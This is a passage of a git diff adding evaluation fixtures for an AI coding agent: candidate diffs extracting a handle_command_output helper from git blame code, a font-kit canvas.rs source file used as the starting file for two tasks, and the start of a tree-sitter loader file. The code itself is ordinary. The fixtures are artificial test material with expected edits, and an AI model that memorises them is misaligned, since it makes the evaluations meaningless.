+- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(output); + } + + Ok(String::from_utf8(output.stdout)?) ++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}") + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-09.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-09.diff new file mode 100644 index 0000000000000000000000000000000000000000..6bc45657b3d6bf23b4542deb4f6016472a0e89b9 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-09.diff @@ -0,0 +1,20 @@ +@@ -5,7 +5,7 @@ + use futures::AsyncWriteExt; + use gpui::SharedString; + use serde::{Deserialize, Serialize}; +-use std::process::Stdio; ++use std::process::{Output, Stdio}; + use std::{ops::Range, path::Path}; + use text::Rope; + use time::OffsetDateTime; +@@ -94,6 +94,10 @@ + + let output = child.output().await.context("reading git blame output")?; + ++ handle_command_output(output) ++} ++ ++fn handle_command_output(output: Output) -> Result { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); diff --git a/crates/agent/src/tools/evals/fixtures/from_pixels_constructor/before.rs b/crates/agent/src/tools/evals/fixtures/from_pixels_constructor/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..12590fe6e93dc61f5c319d650b637654c39707d3 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/from_pixels_constructor/before.rs @@ -0,0 +1,339 @@ +// font-kit/src/canvas.rs +// +// Copyright © 2018 The Pathfinder Project Developers. +// +// Licensed under the Apache License, Version 2.0 or the MIT license +// , at your +// option. This file may not be copied, modified, or distributed +// except according to those terms. + +//! An in-memory bitmap surface for glyph rasterization. + +use lazy_static::lazy_static; +use pathfinder_geometry::rect::RectI; +use pathfinder_geometry::vector::Vector2I; +use std::cmp; +use std::fmt; + +use crate::utils; + +lazy_static! { + static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { + let mut lut = [[0; 8]; 256]; + for byte in 0..0x100 { + let mut value = [0; 8]; + for bit in 0..8 { + if (byte & (0x80 >> bit)) != 0 { + value[bit] = 0xff; + } + } + lut[byte] = value + } + lut + }; +} + +/// An in-memory bitmap surface for glyph rasterization. +pub struct Canvas { + /// The raw pixel data. + pub pixels: Vec, + /// The size of the buffer, in pixels. + pub size: Vector2I, + /// The number of *bytes* between successive rows. + pub stride: usize, + /// The image format of the canvas. + pub format: Format, +} + +impl Canvas { + /// Creates a new blank canvas with the given pixel size and format. + /// + /// Stride is automatically calculated from width. + /// + /// The canvas is initialized with transparent black (all values 0). + #[inline] + pub fn new(size: Vector2I, format: Format) -> Canvas { + Canvas::with_stride( + size, + size.x() as usize * format.bytes_per_pixel() as usize, + format, + ) + } + + /// Creates a new blank canvas with the given pixel size, stride (number of bytes between + /// successive rows), and format. + /// + /// The canvas is initialized with transparent black (all values 0). + pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { + Canvas { + pixels: vec![0; stride * size.y() as usize], + size, + stride, + format, + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { + self.blit_from( + Vector2I::default(), + &src.pixels, + src.size, + src.stride, + src.format, + ) + } + + /// Blits to a rectangle with origin at `dst_point` and size according to `src_size`. + /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. + /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. + /// `src_stride` must be equal or larger than the actual data length. + #[allow(dead_code)] + pub(crate) fn blit_from( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + src_format: Format, + ) { + assert_eq!( + src_stride * src_size.y() as usize, + src_bytes.len(), + "Number of pixels in src_bytes does not match stride and size." + ); + assert!( + src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, + "src_stride must be >= than src_size.x()" + ); + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + match (self.format, src_format) { + (Format::A8, Format::A8) + | (Format::Rgb24, Format::Rgb24) + | (Format::Rgba32, Format::Rgba32) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::A8, Format::Rgb24) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::A8) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::Rgba32) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::Rgb24) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_bitmap_1bpp( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + ) { + if self.format != Format::A8 { + unimplemented!() + } + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + let size = dst_rect.size(); + + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + let dest_row_stride = size.x() as usize * dest_bytes_per_pixel; + let src_row_stride = utils::div_round_up(size.x() as usize, 8); + + for y in 0..size.y() { + let (dest_row_start, src_row_start) = ( + (y + dst_rect.origin_y()) as usize * self.stride + + dst_rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + let dest_row_end = dest_row_start + dest_row_stride; + let src_row_end = src_row_start + src_row_stride; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + for x in 0..src_row_stride { + let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; + let dest_start = x * 8; + let dest_end = cmp::min(dest_start + 8, dest_row_stride); + let src = &pattern[0..(dest_end - dest_start)]; + dest_row_pixels[dest_start..dest_end].clone_from_slice(src); + } + } + } + + /// Blits to area `rect` using the data given in the buffer `src_bytes`. + /// `src_stride` must be specified in bytes. + /// The dimensions of `rect` must be in pixels. + fn blit_from_with( + &mut self, + rect: RectI, + src_bytes: &[u8], + src_stride: usize, + src_format: Format, + ) { + let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + + for y in 0..rect.height() { + let (dest_row_start, src_row_start) = ( + (y + rect.origin_y()) as usize * self.stride + + rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; + let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + B::blit(dest_row_pixels, src_row_pixels) + } + } +} + +impl fmt::Debug for Canvas { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.debug_struct("Canvas") + .field("pixels", &self.pixels.len()) // Do not dump a vector content. + .field("size", &self.size) + .field("stride", &self.stride) + .field("format", &self.format) + .finish() + } +} + +/// The image format for the canvas. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum Format { + /// Premultiplied R8G8B8A8, little-endian. + Rgba32, + /// R8G8B8, little-endian. + Rgb24, + /// A8. + A8, +} + +impl Format { + /// Returns the number of bits per pixel that this image format corresponds to. + #[inline] + pub fn bits_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 32, + Format::Rgb24 => 24, + Format::A8 => 8, + } + } + + /// Returns the number of color channels per pixel that this image format corresponds to. + #[inline] + pub fn components_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 4, + Format::Rgb24 => 3, + Format::A8 => 1, + } + } + + /// Returns the number of bits per color channel that this image format contains. + #[inline] + pub fn bits_per_component(self) -> u8 { + self.bits_per_pixel() / self.components_per_pixel() + } + + /// Returns the number of bytes per pixel that this image format corresponds to. + #[inline] + pub fn bytes_per_pixel(self) -> u8 { + self.bits_per_pixel() / 8 + } +} + +/// The antialiasing strategy that should be used when rasterizing glyphs. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum RasterizationOptions { + /// "Black-and-white" rendering. Each pixel is either entirely on or off. + Bilevel, + /// Grayscale antialiasing. Only one channel is used. + GrayscaleAa, + /// Subpixel RGB antialiasing, for LCD screens. + SubpixelAa, +} + +trait Blit { + fn blit(dest: &mut [u8], src: &[u8]); +} + +struct BlitMemcpy; + +impl Blit for BlitMemcpy { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + dest.clone_from_slice(src) + } +} + +struct BlitRgb24ToA8; + +impl Blit for BlitRgb24ToA8 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. + for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { + *dest = src[1] + } + } +} + +struct BlitA8ToRgb24; + +impl Blit for BlitA8ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { + dest[0] = *src; + dest[1] = *src; + dest[2] = *src; + } + } +} + +struct BlitRgba32ToRgb24; + +impl Blit for BlitRgba32ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. + for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { + dest.copy_from_slice(&src[0..3]) + } + } +} + +struct BlitRgb24ToRgba32; + +impl Blit for BlitRgb24ToRgba32 { + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { + dest[0] = src[0]; + dest[1] = src[1]; + dest[2] = src[2]; + dest[3] = 255; + } + } +} diff --git a/crates/agent/src/tools/evals/fixtures/translate_doc_comments/before.rs b/crates/agent/src/tools/evals/fixtures/translate_doc_comments/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..12590fe6e93dc61f5c319d650b637654c39707d3 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/translate_doc_comments/before.rs @@ -0,0 +1,339 @@ +// font-kit/src/canvas.rs +// +// Copyright © 2018 The Pathfinder Project Developers. +// +// Licensed under the Apache License, Version 2.0 or the MIT license +// , at your +// option. This file may not be copied, modified, or distributed +// except according to those terms. + +//! An in-memory bitmap surface for glyph rasterization. + +use lazy_static::lazy_static; +use pathfinder_geometry::rect::RectI; +use pathfinder_geometry::vector::Vector2I; +use std::cmp; +use std::fmt; + +use crate::utils; + +lazy_static! { + static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { + let mut lut = [[0; 8]; 256]; + for byte in 0..0x100 { + let mut value = [0; 8]; + for bit in 0..8 { + if (byte & (0x80 >> bit)) != 0 { + value[bit] = 0xff; + } + } + lut[byte] = value + } + lut + }; +} + +/// An in-memory bitmap surface for glyph rasterization. +pub struct Canvas { + /// The raw pixel data. + pub pixels: Vec, + /// The size of the buffer, in pixels. + pub size: Vector2I, + /// The number of *bytes* between successive rows. + pub stride: usize, + /// The image format of the canvas. + pub format: Format, +} + +impl Canvas { + /// Creates a new blank canvas with the given pixel size and format. + /// + /// Stride is automatically calculated from width. + /// + /// The canvas is initialized with transparent black (all values 0). + #[inline] + pub fn new(size: Vector2I, format: Format) -> Canvas { + Canvas::with_stride( + size, + size.x() as usize * format.bytes_per_pixel() as usize, + format, + ) + } + + /// Creates a new blank canvas with the given pixel size, stride (number of bytes between + /// successive rows), and format. + /// + /// The canvas is initialized with transparent black (all values 0). + pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { + Canvas { + pixels: vec![0; stride * size.y() as usize], + size, + stride, + format, + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { + self.blit_from( + Vector2I::default(), + &src.pixels, + src.size, + src.stride, + src.format, + ) + } + + /// Blits to a rectangle with origin at `dst_point` and size according to `src_size`. + /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. + /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. + /// `src_stride` must be equal or larger than the actual data length. + #[allow(dead_code)] + pub(crate) fn blit_from( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + src_format: Format, + ) { + assert_eq!( + src_stride * src_size.y() as usize, + src_bytes.len(), + "Number of pixels in src_bytes does not match stride and size." + ); + assert!( + src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, + "src_stride must be >= than src_size.x()" + ); + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + match (self.format, src_format) { + (Format::A8, Format::A8) + | (Format::Rgb24, Format::Rgb24) + | (Format::Rgba32, Format::Rgba32) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::A8, Format::Rgb24) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::A8) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::Rgba32) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::Rgb24) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_bitmap_1bpp( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + ) { + if self.format != Format::A8 { + unimplemented!() + } + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + let size = dst_rect.size(); + + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + let dest_row_stride = size.x() as usize * dest_bytes_per_pixel; + let src_row_stride = utils::div_round_up(size.x() as usize, 8); + + for y in 0..size.y() { + let (dest_row_start, src_row_start) = ( + (y + dst_rect.origin_y()) as usize * self.stride + + dst_rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + let dest_row_end = dest_row_start + dest_row_stride; + let src_row_end = src_row_start + src_row_stride; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + for x in 0..src_row_stride { + let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; + let dest_start = x * 8; + let dest_end = cmp::min(dest_start + 8, dest_row_stride); + let src = &pattern[0..(dest_end - dest_start)]; + dest_row_pixels[dest_start..dest_end].clone_from_slice(src); + } + } + } + + /// Blits to area `rect` using the data given in the buffer `src_bytes`. + /// `src_stride` must be specified in bytes. + /// The dimensions of `rect` must be in pixels. + fn blit_from_with( + &mut self, + rect: RectI, + src_bytes: &[u8], + src_stride: usize, + src_format: Format, + ) { + let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + + for y in 0..rect.height() { + let (dest_row_start, src_row_start) = ( + (y + rect.origin_y()) as usize * self.stride + + rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; + let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + B::blit(dest_row_pixels, src_row_pixels) + } + } +} + +impl fmt::Debug for Canvas { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.debug_struct("Canvas") + .field("pixels", &self.pixels.len()) // Do not dump a vector content. + .field("size", &self.size) + .field("stride", &self.stride) + .field("format", &self.format) + .finish() + } +} + +/// The image format for the canvas. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum Format { + /// Premultiplied R8G8B8A8, little-endian. + Rgba32, + /// R8G8B8, little-endian. + Rgb24, + /// A8. + A8, +} + +impl Format { + /// Returns the number of bits per pixel that this image format corresponds to. + #[inline] + pub fn bits_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 32, + Format::Rgb24 => 24, + Format::A8 => 8, + } + } + + /// Returns the number of color channels per pixel that this image format corresponds to. + #[inline] + pub fn components_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 4, + Format::Rgb24 => 3, + Format::A8 => 1, + } + } + + /// Returns the number of bits per color channel that this image format contains. + #[inline] + pub fn bits_per_component(self) -> u8 { + self.bits_per_pixel() / self.components_per_pixel() + } + + /// Returns the number of bytes per pixel that this image format corresponds to. + #[inline] + pub fn bytes_per_pixel(self) -> u8 { + self.bits_per_pixel() / 8 + } +} + +/// The antialiasing strategy that should be used when rasterizing glyphs. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum RasterizationOptions { + /// "Black-and-white" rendering. Each pixel is either entirely on or off. + Bilevel, + /// Grayscale antialiasing. Only one channel is used. + GrayscaleAa, + /// Subpixel RGB antialiasing, for LCD screens. + SubpixelAa, +} + +trait Blit { + fn blit(dest: &mut [u8], src: &[u8]); +} + +struct BlitMemcpy; + +impl Blit for BlitMemcpy { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + dest.clone_from_slice(src) + } +} + +struct BlitRgb24ToA8; + +impl Blit for BlitRgb24ToA8 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. + for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { + *dest = src[1] + } + } +} + +struct BlitA8ToRgb24; + +impl Blit for BlitA8ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { + dest[0] = *src; + dest[1] = *src; + dest[2] = *src; + } + } +} + +struct BlitRgba32ToRgb24; + +impl Blit for BlitRgba32ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. + for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { + dest.copy_from_slice(&src[0..3]) + } + } +} + +struct BlitRgb24ToRgba32; + +impl Blit for BlitRgb24ToRgba32 { + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { + dest[0] = src[0]; + dest[1] = src[1]; + dest[2] = src[2]; + dest[3] = 255; + } + } +} diff --git a/crates/agent/src/tools/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs b/crates/agent/src/tools/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..cfa28fe1ad6091c9adda22f610e1cf13166f8dfb --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs @@ -0,0 +1,1629 @@ +#![doc = include_str!("../README.md")] +#![cfg_attr(docsrs, feature(doc_cfg))] + +#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] +use std::ops::Range; +#[cfg(feature = "tree-sitter-highlight")] +use std::sync::Mutex; +use std::{ + collections::HashMap, + env, + ffi::{OsStr, OsString}, + fs, + io::{BufRead, BufReader}, + mem, + path::{Path, PathBuf}, + process::Command, + sync::LazyLock, + time::SystemTime, +}; + +#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] +use anyhow::Error; +use anyhow::{Context as _, Result, anyhow}; +use etcetera::BaseStrategy as _; +use fs4::fs_std::FileExt; +use indoc::indoc; +use libloading::{Library, Symbol}; +use once_cell::unsync::OnceCell; +use path_slash::PathBufExt as _; +use regex::{Regex, RegexBuilder}; +use semver::Version; +use serde::{Deserialize, Deserializer, Serialize}; +use tree_sitter::Language; +#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] +use tree_sitter::QueryError; +#[cfg(feature = "tree-sitter-highlight")] +use tree_sitter::QueryErrorKind; +#[cfg(feature = "tree-sitter-highlight")] +use tree_sitter_highlight::HighlightConfiguration; +#[cfg(feature = "tree-sitter-tags")] +use tree_sitter_tags::{Error as TagsError, TagsConfiguration}; +use url::Url; + +static GRAMMAR_NAME_REGEX: LazyLock = + LazyLock::new(|| Regex::new(r#""name":\s*"(.*?)""#).unwrap()); + +pub const EMSCRIPTEN_TAG: &str = concat!("docker.io/emscripten/emsdk:", env!("EMSCRIPTEN_VERSION")); + +#[derive(Default, Deserialize, Serialize)] +pub struct Config { + #[serde(default)] + #[serde( + rename = "parser-directories", + deserialize_with = "deserialize_parser_directories" + )] + pub parser_directories: Vec, +} + +#[derive(Serialize, Deserialize, Clone, Default)] +#[serde(untagged)] +pub enum PathsJSON { + #[default] + Empty, + Single(PathBuf), + Multiple(Vec), +} + +impl PathsJSON { + fn into_vec(self) -> Option> { + match self { + Self::Empty => None, + Self::Single(s) => Some(vec![s]), + Self::Multiple(s) => Some(s), + } + } + + const fn is_empty(&self) -> bool { + matches!(self, Self::Empty) + } +} + +#[derive(Serialize, Deserialize, Clone)] +#[serde(untagged)] +pub enum PackageJSONAuthor { + String(String), + Object { + name: String, + email: Option, + url: Option, + }, +} + +#[derive(Serialize, Deserialize, Clone)] +#[serde(untagged)] +pub enum PackageJSONRepository { + String(String), + Object { url: String }, +} + +#[derive(Serialize, Deserialize)] +pub struct PackageJSON { + pub name: String, + pub version: Version, + pub description: Option, + pub author: Option, + pub maintainers: Option>, + pub license: Option, + pub repository: Option, + #[serde(default)] + #[serde(rename = "tree-sitter", skip_serializing_if = "Option::is_none")] + pub tree_sitter: Option>, +} + +fn default_path() -> PathBuf { + PathBuf::from(".") +} + +#[derive(Serialize, Deserialize, Clone)] +#[serde(rename_all = "kebab-case")] +pub struct LanguageConfigurationJSON { + #[serde(default = "default_path")] + pub path: PathBuf, + pub scope: Option, + pub file_types: Option>, + pub content_regex: Option, + pub first_line_regex: Option, + pub injection_regex: Option, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub highlights: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub injections: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub locals: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub tags: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub external_files: PathsJSON, +} + +#[derive(Serialize, Deserialize)] +#[serde(rename_all = "kebab-case")] +pub struct TreeSitterJSON { + #[serde(rename = "$schema")] + pub schema: Option, + pub grammars: Vec, + pub metadata: Metadata, + #[serde(default)] + pub bindings: Bindings, +} + +impl TreeSitterJSON { + pub fn from_file(path: &Path) -> Result { + Ok(serde_json::from_str(&fs::read_to_string( + path.join("tree-sitter.json"), + )?)?) + } + + #[must_use] + pub fn has_multiple_language_configs(&self) -> bool { + self.grammars.len() > 1 + } +} + +#[derive(Serialize, Deserialize)] +#[serde(rename_all = "kebab-case")] +pub struct Grammar { + pub name: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub camelcase: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, + pub scope: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub path: Option, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub external_files: PathsJSON, + pub file_types: Option>, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub highlights: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub injections: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub locals: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub tags: PathsJSON, + #[serde(skip_serializing_if = "Option::is_none")] + pub injection_regex: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub first_line_regex: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub content_regex: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub class_name: Option, +} + +#[derive(Serialize, Deserialize)] +pub struct Metadata { + pub version: Version, + #[serde(skip_serializing_if = "Option::is_none")] + pub license: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub description: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub authors: Option>, + #[serde(skip_serializing_if = "Option::is_none")] + pub links: Option, + #[serde(skip)] + pub namespace: Option, +} + +#[derive(Serialize, Deserialize)] +pub struct Author { + pub name: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub email: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub url: Option, +} + +#[derive(Serialize, Deserialize)] +pub struct Links { + pub repository: Url, + #[serde(skip_serializing_if = "Option::is_none")] + pub funding: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub homepage: Option, +} + +#[derive(Serialize, Deserialize)] +#[serde(default)] +pub struct Bindings { + pub c: bool, + pub go: bool, + #[serde(skip)] + pub java: bool, + #[serde(skip)] + pub kotlin: bool, + pub node: bool, + pub python: bool, + pub rust: bool, + pub swift: bool, + pub zig: bool, +} + +impl Default for Bindings { + fn default() -> Self { + Self { + c: true, + go: true, + java: false, + kotlin: false, + node: true, + python: true, + rust: true, + swift: true, + zig: false, + } + } +} + +// Replace `~` or `$HOME` with home path string. +// (While paths like "~/.tree-sitter/config.json" can be deserialized, +// they're not valid path for I/O modules.) +fn deserialize_parser_directories<'de, D>(deserializer: D) -> Result, D::Error> +where + D: Deserializer<'de>, +{ + let paths = Vec::::deserialize(deserializer)?; + let Ok(home) = etcetera::home_dir() else { + return Ok(paths); + }; + let standardized = paths + .into_iter() + .map(|path| standardize_path(path, &home)) + .collect(); + Ok(standardized) +} + +fn standardize_path(path: PathBuf, home: &Path) -> PathBuf { + if let Ok(p) = path.strip_prefix("~") { + return home.join(p); + } + if let Ok(p) = path.strip_prefix("$HOME") { + return home.join(p); + } + path +} + +impl Config { + #[must_use] + pub fn initial() -> Self { + let home_dir = etcetera::home_dir().expect("Cannot determine home directory"); + Self { + parser_directories: vec![ + home_dir.join("github"), + home_dir.join("src"), + home_dir.join("source"), + home_dir.join("projects"), + home_dir.join("dev"), + home_dir.join("git"), + ], + } + } +} + +const BUILD_TARGET: &str = env!("BUILD_TARGET"); +const BUILD_HOST: &str = env!("BUILD_HOST"); + +pub struct LanguageConfiguration<'a> { + pub scope: Option, + pub content_regex: Option, + pub first_line_regex: Option, + pub injection_regex: Option, + pub file_types: Vec, + pub root_path: PathBuf, + pub highlights_filenames: Option>, + pub injections_filenames: Option>, + pub locals_filenames: Option>, + pub tags_filenames: Option>, + pub language_name: String, + language_id: usize, + #[cfg(feature = "tree-sitter-highlight")] + highlight_config: OnceCell>, + #[cfg(feature = "tree-sitter-tags")] + tags_config: OnceCell>, + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: &'a Mutex>, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: bool, +} + +pub struct Loader { + pub parser_lib_path: PathBuf, + languages_by_id: Vec<(PathBuf, OnceCell, Option>)>, + language_configurations: Vec>, + language_configuration_ids_by_file_type: HashMap>, + language_configuration_in_current_path: Option, + language_configuration_ids_by_first_line_regex: HashMap>, + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: Box>>, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: bool, + debug_build: bool, + sanitize_build: bool, + force_rebuild: bool, + + #[cfg(feature = "wasm")] + wasm_store: Mutex>, +} + +pub struct CompileConfig<'a> { + pub src_path: &'a Path, + pub header_paths: Vec<&'a Path>, + pub parser_path: PathBuf, + pub scanner_path: Option, + pub external_files: Option<&'a [PathBuf]>, + pub output_path: Option, + pub flags: &'a [&'a str], + pub sanitize: bool, + pub name: String, +} + +impl<'a> CompileConfig<'a> { + #[must_use] + pub fn new( + src_path: &'a Path, + externals: Option<&'a [PathBuf]>, + output_path: Option, + ) -> Self { + Self { + src_path, + header_paths: vec![src_path], + parser_path: src_path.join("parser.c"), + scanner_path: None, + external_files: externals, + output_path, + flags: &[], + sanitize: false, + name: String::new(), + } + } +} + +unsafe impl Sync for Loader {} + +impl Loader { + pub fn new() -> Result { + let parser_lib_path = if let Ok(path) = env::var("TREE_SITTER_LIBDIR") { + PathBuf::from(path) + } else { + if cfg!(target_os = "macos") { + let legacy_apple_path = etcetera::base_strategy::Apple::new()? + .cache_dir() // `$HOME/Library/Caches/` + .join("tree-sitter"); + if legacy_apple_path.exists() && legacy_apple_path.is_dir() { + std::fs::remove_dir_all(legacy_apple_path)?; + } + } + + etcetera::choose_base_strategy()? + .cache_dir() + .join("tree-sitter") + .join("lib") + }; + Ok(Self::with_parser_lib_path(parser_lib_path)) + } + + #[must_use] + pub fn with_parser_lib_path(parser_lib_path: PathBuf) -> Self { + Self { + parser_lib_path, + languages_by_id: Vec::new(), + language_configurations: Vec::new(), + language_configuration_ids_by_file_type: HashMap::new(), + language_configuration_in_current_path: None, + language_configuration_ids_by_first_line_regex: HashMap::new(), + #[cfg(feature = 